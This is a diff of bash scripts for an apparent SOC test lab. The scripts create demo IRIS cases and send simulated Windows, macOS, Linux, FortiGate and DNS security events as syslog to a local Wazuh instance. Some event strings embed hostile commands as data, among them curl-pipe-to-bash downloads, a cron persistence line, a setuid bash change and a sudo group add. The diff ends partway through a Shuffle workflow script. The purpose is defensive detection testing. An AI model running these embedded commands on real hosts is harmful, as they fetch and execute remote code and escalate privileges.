+        -d "{
+          \"case_name\": \"${title}\",
+          \"case_description\": \"${description}\",
+          \"case_customer\": ${CASE_CUSTOMER},
+          \"case_soc_id\": \"${CASE_SOC_ID}\"
+        }"
+    )"
+  else
+    echo "error: MODE must be 'integrator' or 'direct'"
+    exit 1
+  fi
+
+  RESPONSE="${response}" python3 - <<'PY'
+import json
+import os
+
+raw = os.environ.get("RESPONSE", "")
+try:
+    data = json.loads(raw)
+except Exception:
+    print(f"raw_response: {raw[:400]}")
+    raise SystemExit(0)
+
+# integrator shape: {"ok": true, "data": {"iris": {...}}}
+if isinstance(data, dict) and "data" in data and isinstance(data["data"], dict):
+    iris = data["data"].get("iris", {})
+    case = iris.get("data", {}) if isinstance(iris, dict) else {}
+    if case:
+        print(
+            f"created case_id={case.get('case_id')} case_uuid={case.get('case_uuid')} "
+            f"title={case.get('case_name')}"
+        )
+    else:
+        print(json.dumps(data))
+    raise SystemExit(0)
+
+# direct IRIS shape: {"status":"success","data":{...}}
+case = data.get("data", {}) if isinstance(data, dict) else {}
+if isinstance(case, dict) and case:
+    print(
+        f"created case_id={case.get('case_id')} case_uuid={case.get('case_uuid')} "
+        f"title={case.get('case_name')}"
+    )
+else:
+    print(json.dumps(data))
+PY
+done
+
+echo "done: created ${COUNT} demo cases (mode=${MODE})"

scripts/send-wazuh-cisco-test-events.sh

@@ -4,6 +4,20 @@ set -euo pipefail
 SCENARIO="${1:-all}"
 COUNT="${2:-1}"
 DELAY="${3:-0.3}"
+FOREVER="false"
+
+for arg in "${@:4}"; do
+  case "${arg}" in
+    --forever)
+      FOREVER="true"
+      ;;
+    *)
+      echo "error: unexpected argument '${arg}'"
+      echo "usage: scripts/send-wazuh-cisco-test-events.sh [scenario] [count] [delay_seconds] [--forever]"
+      exit 1
+      ;;
+  esac
+done
 
 WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
 WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
@@ -19,6 +33,11 @@ if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
   exit 1
 fi
 
+if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
+  echo "error: delay must be numeric (example: 0.5)"
+  exit 1
+fi
+
 emit_syslog() {
   local msg="$1"
   local sent="false"
@@ -100,9 +119,18 @@ send_once() {
   esac
 }
 
-for ((i=1; i<=COUNT; i++)); do
-  send_once
-  if [[ "${i}" -lt "${COUNT}" ]]; then
+if [[ "${FOREVER}" == "true" ]]; then
+  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
+  trap 'echo; echo "stopped"; exit 0' INT TERM
+  while true; do
+    send_once
     sleep "${DELAY}"
-  fi
-done
+  done
+else
+  for ((i=1; i<=COUNT; i++)); do
+    send_once
+    if [[ "${i}" -lt "${COUNT}" ]]; then
+      sleep "${DELAY}"
+    fi
+  done
+fi

scripts/send-wazuh-endpoint-agent-test-events.sh

@@ -0,0 +1,228 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+PLATFORM="${1:-all}"      # windows | mac | linux | all
+SCENARIO="${2:-all}"      # auth | process | persistence | privilege | malware | all
+COUNT="1"
+DELAY="0.3"
+FOREVER="false"
+DRY_RUN="${DRY_RUN:-0}"
+COUNT_SET="false"
+DELAY_SET="false"
+
+WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
+WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
+
+WIN_HOST="${WIN_HOST:-win-client-01}"
+MAC_HOST="${MAC_HOST:-mac-client-01}"
+LINUX_HOST="${LINUX_HOST:-linux-client-01}"
+SIM_USER="${SIM_USER:-jane.doe}"
+
+shift 2 || true
+
+while (($#)); do
+  case "$1" in
+    --forever)
+      FOREVER="true"
+      shift
+      ;;
+    *)
+      if [[ "${COUNT_SET}" == "false" ]]; then
+        COUNT="$1"
+        COUNT_SET="true"
+      elif [[ "${DELAY_SET}" == "false" ]]; then
+        DELAY="$1"
+        DELAY_SET="true"
+      else
+        echo "error: unexpected argument '$1'"
+        echo "usage: scripts/send-wazuh-endpoint-agent-test-events.sh [platform] [scenario] [count] [delay_seconds] [--forever]"
+        exit 1
+      fi
+      shift
+      ;;
+  esac
+done
+
+if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
+  echo "error: count must be a positive integer"
+  exit 1
+fi
+
+if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
+  echo "error: delay must be numeric (example: 0.5)"
+  exit 1
+fi
+
+emit_syslog() {
+  local msg="$1"
+  local sent="false"
+
+  if [[ "${DRY_RUN}" == "1" ]]; then
+    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
+    return 0
+  fi
+
+  if command -v nc >/dev/null 2>&1; then
+    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
+      sent="true"
+    fi
+  fi
+
+  if [[ "${sent}" != "true" ]]; then
+    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
+      sent="true"
+    fi
+  fi
+
+  if [[ "${sent}" != "true" ]]; then
+    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
+    return 1
+  fi
+
+  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
+}
+
+rand_public_ip() {
+  if [[ $((RANDOM % 2)) -eq 0 ]]; then
+    echo "198.51.100.$((RANDOM % 240 + 10))"
+  else
+    echo "203.0.113.$((RANDOM % 240 + 10))"
+  fi
+}
+
+rand_private_ip() {
+  echo "10.$((RANDOM % 20 + 10)).$((RANDOM % 200 + 1)).$((RANDOM % 240 + 10))"
+}
+
+send_windows_auth() {
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_auth_fail severity=medium event_id=4625 account=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
+}
+
+send_windows_process() {
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_suspicious_process severity=high event_id=4688 process=\"powershell.exe\" cmdline=\"powershell -enc <base64>\" parent=\"winword.exe\" user=\"${SIM_USER}\""
+}
+
+send_windows_persistence() {
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_persistence_registry severity=high event_id=4657 registry_path=\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Updater\" user=\"${SIM_USER}\""
+}
+
+send_windows_privilege() {
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_privilege_group_add severity=high event_id=4732 account=\"${SIM_USER}\" target_group=\"Administrators\""
+}
+
+send_windows_malware() {
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_malware_detected severity=high event_id=1116 engine=\"Defender\" threat=\"Trojan:Win32/AgentTesla\" path=\"C:\\\\Users\\\\${SIM_USER}\\\\AppData\\\\Local\\\\Temp\\\\invoice.exe\" action=\"quarantine\""
+}
+
+send_mac_auth() {
+  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_auth_fail severity=medium subsystem=\"com.apple.loginwindow\" user=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
+}
+
+send_mac_process() {
+  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_suspicious_process severity=high process=\"osascript\" cmdline=\"osascript -e do shell script curl ...\" parent=\"Safari\" user=\"${SIM_USER}\""
+}
+
+send_mac_persistence() {
+  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_launchagent_created severity=high plist=\"/Users/${SIM_USER}/Library/LaunchAgents/com.apple.updater.plist\" user=\"${SIM_USER}\""
+}
+
+send_mac_privilege() {
+  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_privilege_escalation severity=high action=\"sudo\" user=\"${SIM_USER}\" tty=\"ttys001\" cmd=\"/bin/chmod +s /bin/bash\""
+}
+
+send_mac_malware() {
+  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_xprotect_detected severity=high signature=\"OSX.Adload\" file=\"/Users/${SIM_USER}/Downloads/installer.pkg\" action=\"blocked\""
+}
+
+send_linux_auth() {
+  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_ssh_auth_fail severity=medium process=\"sshd\" user=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
+}
+
+send_linux_process() {
+  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_suspicious_process severity=high process=\"curl\" cmdline=\"curl http://198.51.100.20/a.sh | bash\" user=\"${SIM_USER}\""
+}
+
+send_linux_persistence() {
+  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_cron_persistence severity=high file=\"/etc/cron.d/system-update\" user=\"root\" command=\"*/5 * * * * curl -fsSL http://203.0.113.20/s | sh\""
+}
+
+send_linux_privilege() {
+  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_sudo_privilege_escalation severity=high user=\"${SIM_USER}\" command=\"sudo usermod -aG sudo ${SIM_USER}\" src_ip=$(rand_private_ip)"
+}
+
+send_linux_malware() {
+  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_malware_detected severity=high scanner=\"clamav\" signature=\"Unix.Trojan.Mirai\" file=\"/tmp/kworkerd\" action=\"removed\""
+}
+
+send_one_platform() {
+  local p="$1"
+  case "${SCENARIO}" in
+    auth)
+      "send_${p}_auth"
+      ;;
+    process)
+      "send_${p}_process"
+      ;;
+    persistence)
+      "send_${p}_persistence"
+      ;;
+    privilege)
+      "send_${p}_privilege"
+      ;;
+    malware)
+      "send_${p}_malware"
+      ;;
+    all)
+      "send_${p}_auth"
+      "send_${p}_process"
+      "send_${p}_persistence"
+      "send_${p}_privilege"
+      "send_${p}_malware"
+      ;;
+    *)
+      echo "error: unknown scenario '${SCENARIO}'"
+      echo "valid: auth | process | persistence | privilege | malware | all"
+      exit 1
+      ;;
+  esac
+}
+
+send_once() {
+  case "${PLATFORM}" in
+    windows)
+      send_one_platform "windows"
+      ;;
+    mac|macos)
+      send_one_platform "mac"
+      ;;
+    linux)
+      send_one_platform "linux"
+      ;;
+    all)
+      send_one_platform "windows"
+      send_one_platform "mac"
+      send_one_platform "linux"
+      ;;
+    *)
+      echo "error: unknown platform '${PLATFORM}'"
+      echo "valid: windows | mac | linux | all"
+      exit 1
+      ;;
+  esac
+}
+
+if [[ "${FOREVER}" == "true" ]]; then
+  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
+  trap 'echo; echo "stopped"; exit 0' INT TERM
+  while true; do
+    send_once
+    sleep "${DELAY}"
+  done
+else
+  for ((i=1; i<=COUNT; i++)); do
+    send_once
+    if [[ "${i}" -lt "${COUNT}" ]]; then
+      sleep "${DELAY}"
+    fi
+  done
+fi

scripts/send-wazuh-proposal-required-events.sh

@@ -0,0 +1,329 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+# Usage:
+#   scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds]
+#
+# selector:
+#   all | a1 | a2 | a3 | a4 | <usecase_id>
+#   example usecase_id: A2-01, A3-05, A4-24
+
+SELECTOR="${1:-all}"
+COUNT="${2:-1}"
+DELAY="${3:-0.3}"
+EVENT_DELAY="${EVENT_DELAY:-0.05}"
+DRY_RUN="${DRY_RUN:-0}"
+FOREVER="false"
+
+for arg in "${@:4}"; do
+  case "${arg}" in
+    --forever)
+      FOREVER="true"
+      ;;
+    *)
+      echo "error: unexpected argument '${arg}'"
+      echo "usage: scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds] [--forever]"
+      exit 1
+      ;;
+  esac
+done
+
+WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
+WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
+
+FGT_DEVNAME="${FGT_DEVNAME:-FGT80F-Branch01}"
+FGT_DEVID="${FGT_DEVID:-FGT80FTK20000001}"
+WIN_HOST="${WIN_HOST:-win-dc01}"
+DNS_HOST="${DNS_HOST:-dns-fw-01}"
+SIM_VPN_USER="${SIM_VPN_USER:-remote.user}"
+
+if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
+  echo "error: count must be a positive integer"
+  exit 1
+fi
+
+if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
+  echo "error: delay must be numeric"
+  exit 1
+fi
+
+if ! [[ "${EVENT_DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
+  echo "error: EVENT_DELAY must be numeric"
+  exit 1
+fi
+
+rand_public_ip() {
+  if [[ $((RANDOM % 2)) -eq 0 ]]; then
+    echo "198.51.100.$((RANDOM % 240 + 10))"
+  else
+    echo "203.0.113.$((RANDOM % 240 + 10))"
+  fi
+}
+
+rand_private_ip() {
+  echo "10.$((RANDOM % 20 + 10)).$((RANDOM % 200 + 1)).$((RANDOM % 240 + 10))"
+}
+
+rand_domain() {
+  echo "ioc-$((RANDOM % 9000 + 1000)).malicious.example"
+}
+
+emit_syslog() {
+  local msg="$1"
+  local sent="false"
+
+  if [[ "${DRY_RUN}" == "1" ]]; then
+    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
+    return 0
+  fi
+
+  if command -v nc >/dev/null 2>&1; then
+    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
+      sent="true"
+    fi
+  fi
+
+  if [[ "${sent}" != "true" ]]; then
+    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
+      sent="true"
+    fi
+  fi
+
+  if [[ "${sent}" != "true" ]]; then
+    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
+    return 1
+  fi
+
+  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
+}
+
+selector_matches() {
+  local id="$1"
+  local section="$2"
+  local sel
+  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
+  local idl
+  idl="$(echo "${id}" | tr '[:upper:]' '[:lower:]')"
+  local sec
+  sec="$(echo "${section}" | tr '[:upper:]' '[:lower:]')"
+
+  [[ "${sel}" == "all" || "${sel}" == "${sec}" || "${sel}" == "${idl}" ]]
+}
+
+emit_fgt_usecase() {
+  local id="$1"
+  local section="$2"
+  local severity="$3"
+  local usecase="$4"
+  local body="$5"
+
+  selector_matches "${id}" "${section}" || return 0
+
+  emit_syslog "<190>date=$(date '+%Y-%m-%d') time=$(date '+%H:%M:%S') devname=\"${FGT_DEVNAME}\" devid=\"${FGT_DEVID}\" eventtime=$(date +%s) vd=\"root\" soc_mvp_test=true source=fortigate section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
+  sleep "${EVENT_DELAY}"
+}
+
+emit_dns_usecase() {
+  local id="$1"
+  local section="$2"
+  local severity="$3"
+  local usecase="$4"
+  local body="$5"
+
+  selector_matches "${id}" "${section}" || return 0
+
+  emit_syslog "<189>$(date '+%b %d %H:%M:%S') ${DNS_HOST} soc_mvp_test=true source=dns section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
+  sleep "${EVENT_DELAY}"
+}
+
+emit_windows_usecase() {
+  local id="$1"
+  local section="$2"
+  local severity="$3"
+  local usecase="$4"
+  local body="$5"
+
+  selector_matches "${id}" "${section}" || return 0
+
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
+  sleep "${EVENT_DELAY}"
+}
+
+emit_a1() {
+  local sip
+  local domain
+  local mip
+  sip="$(rand_private_ip)"
+  domain="$(rand_domain)"
+  mip="$(rand_public_ip)"
+
+  emit_dns_usecase "A1-01" "A1" "medium" \
+    "DNS Network Traffic Communicate to Malicious Domain" \
+    "event_type=ioc_dns_traffic src_ip=${sip} query=${domain} resolved_ip=${mip} action=blocked"
+
+  emit_dns_usecase "A1-02" "A1" "medium" \
+    "DNS Network Traffic Malicious Domain IOCs Detection" \
+    "event_type=ioc_domain_match src_ip=${sip} ioc_type=domain ioc_value=${domain} feed=threatintel_main confidence=high action=alert"
+}
+
+emit_a2() {
+  local pub
+  local sip
+  pub="$(rand_public_ip)"
+  sip="$(rand_private_ip)"
+
+  emit_fgt_usecase "A2-01" "A2" "high" "IPS IDS Network Traffic Allowed RDP from Public IPs" \
+    "logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" srcip=${pub} dstip=${sip} dstport=3389 service=\"RDP\" action=\"accept\" policyid=44"
+
+  emit_fgt_usecase "A2-02" "A2" "high" "IPS IDS Firewall Account Admin Password Change" \
+    "logid=\"0100044547\" type=\"event\" subtype=\"system\" user=\"admin\" action=\"password-change\" target_account=\"admin\""
+
+  emit_fgt_usecase "A2-03" "A2" "high" "IPS IDS Firewall Account Create Add Admin Account" \
+    "logid=\"0100044548\" type=\"event\" subtype=\"system\" user=\"admin\" action=\"create-admin\" target_account=\"secops_admin\""
+
+  emit_fgt_usecase "A2-04" "A2" "high" "IPS IDS Firewall Configure Disabled Email Notification" \
+    "logid=\"0100044551\" type=\"event\" subtype=\"system\" action=\"config-change\" config_item=\"alertemail\" config_value=\"disable\""
+
+  emit_fgt_usecase "A2-05" "A2" "low" "IPS IDS Firewall Configure Download Configure FW" \
+    "logid=\"0100044552\" type=\"event\" subtype=\"system\" action=\"download-config\" user=\"admin\""
+
+  emit_fgt_usecase "A2-06" "A2" "medium" "IPS IDS IDS Alert Multiple Critical High" \
+    "logid=\"0720018432\" type=\"utm\" subtype=\"ips\" action=\"detected\" attack=\"Multiple.Critical.High.Signatures\" severity=\"high\" count=7"
+
+  emit_fgt_usecase "A2-07" "A2" "low" "IPS IDS Network Traffic Port Scanning" \
+    "logid=\"0720018433\" type=\"utm\" subtype=\"anomaly\" attack=\"TCP.Port.Scan\" srcip=${pub} dstip=${sip} action=\"detected\""
+
+  emit_fgt_usecase "A2-08" "A2" "medium" "IPS IDS Network Traffic IOC Detection" \
+    "logid=\"0720018434\" type=\"utm\" subtype=\"ips\" ioc_type=ip ioc_value=$(rand_public_ip) action=\"blocked\""
+
+  emit_fgt_usecase "A2-09" "A2" "medium" "IPS IDS Network Traffic Port Scanning from Private IP" \
+    "logid=\"0720018435\" type=\"utm\" subtype=\"anomaly\" attack=\"Internal.Port.Scan\" srcip=$(rand_private_ip) dstip=$(rand_private_ip) action=\"detected\""
+
+  emit_fgt_usecase "A2-10" "A2" "medium" "IPS IDS Network Traffic Communicate to Malicious IP" \
+    "logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" srcip=$(rand_private_ip) dstip=$(rand_public_ip) threat_label=\"known-c2\" action=\"accept\""
+}
+
+emit_a3() {
+  local out_th
+  out_th="$(rand_public_ip)"
+
+  emit_fgt_usecase "A3-01" "A3" "high" "VPN Authentication Success from Guest Account" \
+    "logid=\"0101037131\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"guest\" srcip=${out_th} country=\"TH\""
+
+  emit_fgt_usecase "A3-02" "A3" "high" "VPN Authentication Success from Multiple Country" \
+    "logid=\"0101037132\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} country=\"US\" previous_country=\"TH\""
+
+  emit_fgt_usecase "A3-03" "A3" "high" "VPN Authentication Brute Force Success" \
+    "logid=\"0101037133\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} failed_attempts_before_success=18"
+
+  emit_fgt_usecase "A3-04" "A3" "low" "VPN Authentication Multiple Fail Many Accounts from One Source" \
+    "logid=\"0101037134\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-fail\" srcip=${out_th} failed_accounts=12"
+
+  emit_fgt_usecase "A3-05" "A3" "high" "VPN Authentication Success from Outside Thailand" \
+    "logid=\"0101037135\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} country=\"US\" expected_country=\"TH\""
+}
+
+emit_a4() {
+  emit_windows_usecase "A4-01" "A4" "medium" "Windows Authentication Multiple Fail from Privileged Account" \
+    "event_id=4625 account=\"administrator\" src_ip=$(rand_private_ip) fail_count=9"
+  emit_windows_usecase "A4-02" "A4" "medium" "Windows Authentication Multiple Fail from Service Account" \
+    "event_id=4625 account=\"svc_backup\" src_ip=$(rand_private_ip) fail_count=11"
+  emit_windows_usecase "A4-03" "A4" "medium" "Windows AD Enumeration with Malicious Tools" \
+    "event_id=4688 process=\"adfind.exe\" user=\"user1\" host=\"${WIN_HOST}\""
+  emit_windows_usecase "A4-04" "A4" "medium" "Windows Authentication Fail from Public IPs" \
+    "event_id=4625 account=\"user1\" src_ip=$(rand_public_ip) fail_count=4"
+  emit_windows_usecase "A4-05" "A4" "medium" "Windows File Share Enumeration to Single Destination" \
+    "event_id=5145 account=\"user1\" src_ip=$(rand_private_ip) share=\"\\\\\\\\fileserver\\\\finance\" object_count=87"
+  emit_windows_usecase "A4-06" "A4" "high" "Windows Authentication Success from Public IPs" \
+    "event_id=4624 account=\"user2\" src_ip=$(rand_public_ip) logon_type=10"
+  emit_windows_usecase "A4-07" "A4" "high" "Windows Authentication Privileged Account Impersonation" \
+    "event_id=4624 account=\"administrator\" impersonation=true source_account=\"user2\""
+  emit_windows_usecase "A4-08" "A4" "high" "Windows Authentication Successful Pass the Hash RDP" \
+    "event_id=4624 account=\"administrator\" logon_type=10 auth_package=\"NTLM\" pth_indicator=true"
+  emit_windows_usecase "A4-09" "A4" "high" "Windows Authentication Success from Guest Account" \
+    "event_id=4624 account=\"guest\" logon_type=3"
+  emit_windows_usecase "A4-10" "A4" "high" "Windows Authentication Interactive Logon Success by Service Account" \
+    "event_id=4624 account=\"svc_backup\" logon_type=2"
+  emit_windows_usecase "A4-11" "A4" "high" "Windows Account Added to Privileged Custom Group" \
+    "event_id=4732 account=\"user3\" target_group=\"SOC-Privileged-Custom\""
+  emit_windows_usecase "A4-12" "A4" "high" "Windows Account Added to Privileged Group" \
+    "event_id=4728 account=\"user3\" target_group=\"Domain Admins\""
+  emit_windows_usecase "A4-13" "A4" "high" "Windows Domain Configure DSRM Password Reset" \
+    "event_id=4794 account=\"administrator\" action=\"dsrm-password-reset\""
+  emit_windows_usecase "A4-14" "A4" "low" "Windows Authentication Multiple Fail One Account from Many Sources" \
+    "event_id=4625 account=\"user4\" src_count=15 fail_count=28"
+  emit_windows_usecase "A4-15" "A4" "low" "Windows Authentication Multiple Fail Many Accounts from One Source" \
+    "event_id=4625 src_ip=$(rand_private_ip) account_count=18 fail_count=42"
+  emit_windows_usecase "A4-16" "A4" "low" "Windows Authentication Multiple Fail from Guest Account" \
+    "event_id=4625 account=\"guest\" fail_count=9"
+  emit_windows_usecase "A4-17" "A4" "low" "Windows Authentication Multiple Fail One Account from One Source" \
+    "event_id=4625 account=\"user5\" src_ip=$(rand_private_ip) fail_count=10"
+  emit_windows_usecase "A4-18" "A4" "low" "Windows Authentication Multiple Interactive Logon Denied" \
+    "event_id=4625 account=\"user6\" logon_type=2 fail_count=7"
+  emit_windows_usecase "A4-19" "A4" "low" "Windows Authentication Password Spray" \
+    "event_id=4625 spray=true src_ip=$(rand_public_ip) attempted_accounts=25"
+  emit_windows_usecase "A4-20" "A4" "low" "Windows Authentication Attempt from Disabled Account" \
+    "event_id=4625 account=\"disabled.user\" status=\"0xC0000072\""
+  emit_windows_usecase "A4-21" "A4" "low" "Windows Domain Account Created" \
+    "event_id=4720 account=\"new.domain.user\" account_type=\"domain\""
+  emit_windows_usecase "A4-22" "A4" "low" "Windows Local Account Re Enabled" \
+    "event_id=4722 account=\"local.user\" account_type=\"local\""
+  emit_windows_usecase "A4-23" "A4" "low" "Windows Local Account Created" \
+    "event_id=4720 account=\"local.new\" account_type=\"local\""
+  emit_windows_usecase "A4-24" "A4" "low" "Windows Domain Account Re Enabled" \
+    "event_id=4722 account=\"domain.reenabled\" account_type=\"domain\""
+}
+
+emit_selected_set() {
+  local sel
+  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
+
+  case "${sel}" in
+    all)
+      emit_a1
+      emit_a2
+      emit_a3
+      emit_a4
+      ;;
+    a1|a1-*)
+      emit_a1
+      ;;
+    a2|a2-*)
+      emit_a2
+      ;;
+    a3|a3-*)
+      emit_a3
+      ;;
+    a4|a4-*)
+      emit_a4
+      ;;
+    *)
+      # Exact usecase selectors (e.g. A3-05) are handled by selector_matches.
+      emit_a1
+      emit_a2
+      emit_a3
+      emit_a4
+      ;;
+  esac
+}
+
+echo "starting proposal-required log simulator"
+echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN}"
+echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
+
+if [[ "${FOREVER}" == "true" ]]; then
+  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
+  trap 'echo; echo "stopped"; exit 0' INT TERM
+  while true; do
+    emit_selected_set
+    sleep "${DELAY}"
+  done
+else
+  for ((i=1; i<=COUNT; i++)); do
+    emit_selected_set
+    if [[ "${i}" -lt "${COUNT}" ]]; then
+      sleep "${DELAY}"
+    fi
+  done
+  echo "done"
+fi

scripts/send-wazuh-test-events.sh

@@ -4,6 +4,20 @@ set -euo pipefail
 SCENARIO="${1:-all}"
 COUNT="${2:-1}"
 DELAY="${3:-0.3}"
+FOREVER="false"
+
+for arg in "${@:4}"; do
+  case "${arg}" in
+    --forever)
+      FOREVER="true"
+      ;;
+    *)
+      echo "error: unexpected argument '${arg}'"
+      echo "usage: scripts/send-wazuh-test-events.sh [scenario] [count] [delay_seconds] [--forever]"
+      exit 1
+      ;;
+  esac
+done
 
 WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
 WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
@@ -16,6 +30,11 @@ if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
   exit 1
 fi
 
+if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
+  echo "error: delay must be numeric (example: 0.5)"
+  exit 1
+fi
+
 emit_syslog() {
   local msg="$1"
   local sent="false"
@@ -96,9 +115,18 @@ send_once() {
   esac
 }
 
-for ((i=1; i<=COUNT; i++)); do
-  send_once
-  if [[ "${i}" -lt "${COUNT}" ]]; then
+if [[ "${FOREVER}" == "true" ]]; then
+  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
+  trap 'echo; echo "stopped"; exit 0' INT TERM
+  while true; do
+    send_once
     sleep "${DELAY}"
-  fi
-done
+  done
+else
+  for ((i=1; i<=COUNT; i++)); do
+    send_once
+    if [[ "${i}" -lt "${COUNT}" ]]; then
+      sleep "${DELAY}"
+    fi
+  done
+fi

scripts/update-shuffle-workflow-from-template.sh

@@ -0,0 +1,77 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+SHUFFLE_BASE_URL="${SHUFFLE_BASE_URL:-http://localhost:5001}"
+SHUFFLE_API_KEY="${SHUFFLE_API_KEY:-}"
+WORKFLOW_ID="${1:-0b2c5b48-0e02-49a3-8e12-2bc892ac15f9}"
+TEMPLATE_FILE="${2:-shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json}"
+
+if [[ -z "${SHUFFLE_API_KEY}" ]]; then
+  echo "error: SHUFFLE_API_KEY is required"
+  echo "example: SHUFFLE_API_KEY=xxxx scripts/update-shuffle-workflow-from-template.sh"
+  exit 1
+fi
+
+if [[ ! -f "${TEMPLATE_FILE}" ]]; then
+  echo "error: template file not found: ${TEMPLATE_FILE}"
+  exit 1
+fi
+
+tmp_payload="$(mktemp)"
+trap 'rm -f "${tmp_payload}"' EXIT
+
+python3 - "${TEMPLATE_FILE}" "${WORKFLOW_ID}" > "${tmp_payload}" <<'PY'
+import json
+import sys
+
+template_file = sys.argv[1]
+workflow_id = sys.argv[2]
+
